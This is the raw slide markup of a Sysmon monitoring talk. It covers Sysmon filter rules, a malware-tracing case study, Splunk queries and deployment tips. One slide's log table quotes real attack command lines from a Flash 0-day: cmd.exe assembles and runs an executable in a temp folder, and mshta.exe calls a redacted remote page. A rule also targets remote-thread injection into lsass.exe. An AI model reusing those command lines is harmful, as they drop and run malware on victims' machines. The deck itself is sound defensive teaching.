            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TargetImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> condition="image"&gt;lsass.exe&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TargetImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TargetImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> condition="image"&gt;winlogon.exe&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TargetImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exclude all Microsoft-signed image loads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="exclude"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Signature condition="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/Signature&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;Signature condition="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/Signature&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1060704" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill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85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Forensics:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case of the Unwanted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	SONAR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826000"/>
            <a:ext cx="1052513" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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Case of My Mom’s Chronically Infected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Mom’s PC repeatedly infected with malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Either MS Security Essentials or I would clean it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Made her standard user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>She still got infected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80" y="1909825"/>
            <a:ext cx="4143683" cy="292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09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Case of My Mom’s Chronically Infected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Saw from Defender log that malware was using the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>drvinst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Where was it coming from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installed Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hope to trace the cause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sure, enough, system was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reinfected</a:t>
            </a:r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54" y="1540351"/>
            <a:ext cx="8151766" cy="501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487" y="1971870"/>
            <a:ext cx="7551513" cy="361819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756263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Case of My Mom’s Chronically Infected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smtClean="0"/>
              <a:t>Remotely connected and downloaded Sysmon log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Searched for drvinst and found MSEE cleaning infection at 9/14/14 4:21 AM, but no suspicious entries nearby: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045" y="2596478"/>
            <a:ext cx="4071360" cy="186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55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Case of My Mom’s Chronically Infected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"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369740" y="1066260"/>
            <a:ext cx="8423385" cy="4024214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Searched again for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>drvinst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and came across Drvinst-2.exe launch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Launched by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SwvUpdater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, so searched for that…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002" y="1536676"/>
            <a:ext cx="5799902" cy="26499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68717" y="2719337"/>
            <a:ext cx="5618545" cy="284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1968717" y="3901998"/>
            <a:ext cx="5618545" cy="284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21323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Case of My Mom’s Chronically Infected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smtClean="0"/>
              <a:t>Saw entry that showed it was launched by scheduled task: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13" y="1817384"/>
            <a:ext cx="4949916" cy="26213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58043" y="4128862"/>
            <a:ext cx="4935766" cy="342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12543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Sysinternals Sysmon (System Monitor)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69740" y="1066259"/>
            <a:ext cx="5644561" cy="39629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Background system monitoring utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Record system events to the Windows event log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used for system anomaly detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forensics can trace intruder activity across the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I wrote it for use within Microsoft corporate network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To understand attacker behavior and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Significant contributions by Thomas Garnier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free download from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysinternals.com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811" y="786227"/>
            <a:ext cx="2891302" cy="398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9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Case of My Mom’s Chronically Infected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"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369741" y="1066260"/>
            <a:ext cx="4026138" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used Sigcheck to submit it to VirusTotal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many engines flagged it as malicious </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sadly, MSEE did not (subsequently submitted to MS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How could I have missed it?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390" y="669959"/>
            <a:ext cx="4236486" cy="379077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73599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Case of My Mom’s Chronically Infected PC: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"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369740" y="1066259"/>
            <a:ext cx="8423385" cy="39676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Opened Autoruns and found its scheduled task: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Had overlooked it in cleanings because of generic description and valid signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disabled it: problem solved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31" y="1379208"/>
            <a:ext cx="6628460" cy="232139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254342" y="2310976"/>
            <a:ext cx="6501238" cy="169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270599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4759" y="943880"/>
            <a:ext cx="8423385" cy="339399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Detonation chamber for malware, O365 attachment validation, IE 0-day detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> logs detect malware escape from Windows, IE and Office sandboxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> log analysis can lead researchers to escape vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Flash 0-day detected in December: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966023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="632081" y="3256764"/>
          <a:ext cx="8191499" cy="17184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3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854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Image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0" marR="41560" marT="20780" marB="207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 err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>CommandLine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0" marR="41560" marT="20780" marB="207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ParentImage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ParentImage CommandLine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624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C:\Program Files\Internet Explorer\iexplore.exe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0" marR="41560" marT="20780" marB="207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C:\Program Files\Internet Explorer\iexplore.exe SCODEF:512 CREDAT:267521 /prefetch:2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0" marR="41560" marT="20780" marB="207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C:\Program Files\Internet Explorer\iexplore.exe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C:\Program Files\Internet Explorer\iexplore.exe </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600" u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://[REDACTED].com/Infected.swf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496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C:\Windows\System32\cmd.exe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0" marR="41560" marT="20780" marB="207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 err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> /c </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>echo|set</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/p="MZ"&gt;"c:\users\user\appdata\local\temp\low\execb.exe"&amp;type "c:\users\user\appdata\local\temp\low\S"&gt;&gt;"c:\users\user\appdata\local\temp\low\execb.exe"&amp;"c:\users\user\appdata\local\temp\low\execb.exe"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0" marR="41560" marT="20780" marB="207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C:\Program Files\Internet Explorer\iexplore.exe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C:\Program Files\Internet Explorer\iexplore.exe SCODEF:512 CREDAT:267521 /prefetch:2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872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C:\Windows\System32\cmd.exe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0" marR="41560" marT="20780" marB="207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C:\Windows\system32\cmd.exe /S /D /c" set/p="MZ" 1&gt;"c:\users\user\appdata\local\temp\low\execb.exe""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0" marR="41560" marT="20780" marB="207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C:\Windows\System32\cmd.exe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cmd /c echo|set/p="MZ"&gt;"c:\users\user\appdata\local\temp\low\execb.exe"&amp;type "c:\users\user\appdata\local\temp\low\S"&gt;&gt;"c:\users\user\appdata\local\temp\low\execb.exe"&amp;"c:\users\user\appdata\local\temp\low\execb.exe"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624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C:\Users\User\AppData\Local\Temp\Low\execb.exe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0" marR="41560" marT="20780" marB="207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"c:\users\user\appdata\local\temp\low\execb.exe"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0" marR="41560" marT="20780" marB="207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C:\Windows\System32\cmd.exe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C:\Windows\system32\cmd.exe /S /D /c" set/p="MZ" 1&gt;"c:\users\user\appdata\local\temp\low\execb.exe""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872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C:\Windows\System32\mshta.exe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0" marR="41560" marT="20780" marB="207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C:\Windows\system32\mshta.exe "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600" u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>http://[REDACTED].com/Page.aspx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>"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60" marR="41560" marT="20780" marB="207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c:\users\user\appdata\local\temp\low\execb.exe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"c:\users\user\appdata\local\temp\low\execb.exe"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554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Network-Wide Monitoring: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Splunk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Microsoft Operations Management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826000"/>
            <a:ext cx="1052513" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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Splunk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 err="1" smtClean="0"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enables collection and rich queries of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for Sysmon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com/splunk/TA-microsoft-sysmon):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> universal forwarder on Sysmon systems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Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Sysmon TA on search heads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set Sysmon configuration to exclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>binaries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95483" y="3822111"/>
            <a:ext cx="6110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85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Image condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“end with"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/Image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“end with"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="85258B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg_replay.exe&lt;/Image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8525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Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Example 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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://blogs.splunk.com/2014/11/24/monitoring-network-traffic-with-sysmon-and-splunk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dirty="0" smtClean="0"/>
              <a:t>Processes grouped by logon GUID:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Outbound connections by process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Command line for non-local connections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="20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98502" y="2326357"/>
            <a:ext cx="7769193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sourcetype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XmlWinEventLog:Microsoft-Windows-Sysmon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/Operational"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EventCode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=1 NOT User="NT AUTHORITY\\SYSTEM" | stats values(User) as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User,values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CommandLine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CommandLine,values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ProcessId,values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ParentProcessId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ParentProcessId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values(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ParentCommandLine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ParentCommandLine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by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LogonGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" alt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64531" y="3246875"/>
            <a:ext cx="8168910" cy="618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sourcetype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XmlWinEventLog:Microsoft-Windows-Sysmon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/Operational"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EventCode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=3 Protocol=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Initiated=true |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=if(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isnotnull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SourceHostname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SourceHostname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+":"+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SourcePort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SourceIp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+":"+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SourcePort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|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=if(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isnotnull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DestinationHostname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DestinationHostname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+":"+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DestinationPort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DestinationIp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+":"+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DestinationPort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|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src_dest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" =&gt; " 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stats values(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src_dest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as Connection by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ProcessGuid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User Computer Image</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" alt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42811" y="4234592"/>
            <a:ext cx="8168910" cy="618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sourcetype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xmlwineventlog:microsoft-windows-sysmon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/operational"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EventCode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=3 Protocol=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Initiated=true | where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DestinationIp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!="127.0.0.1" AND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DestinationHostname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SourceHostname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table _time User Computer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ProcessGuid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DestinationHostname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DestinationPort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join type=inner [search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sourcetype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xmlwineventlog:microsoft-windows-sysmon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/operational"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EventCode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=1 | table _time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ProcessGuid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CommandLine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Management Suite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36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98501" y="1066259"/>
            <a:ext cx="8094623" cy="3814834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OMS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System monitoring and configuration for Windows and Linux systems (VMs, physical, cloud, etc.)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/>
              <a:t>support for agent that can forward arbitrary logs to Operational Insights service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logs can be used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Standing dashboard queries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Ad-hoc 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Best Practices and Tips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826000"/>
            <a:ext cx="1052513" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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4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and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40" y="1066259"/>
            <a:ext cx="8423385" cy="396937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Install it on all your systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proven at scale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data will be there when you need it for DFIR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure all event types for maximum visibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
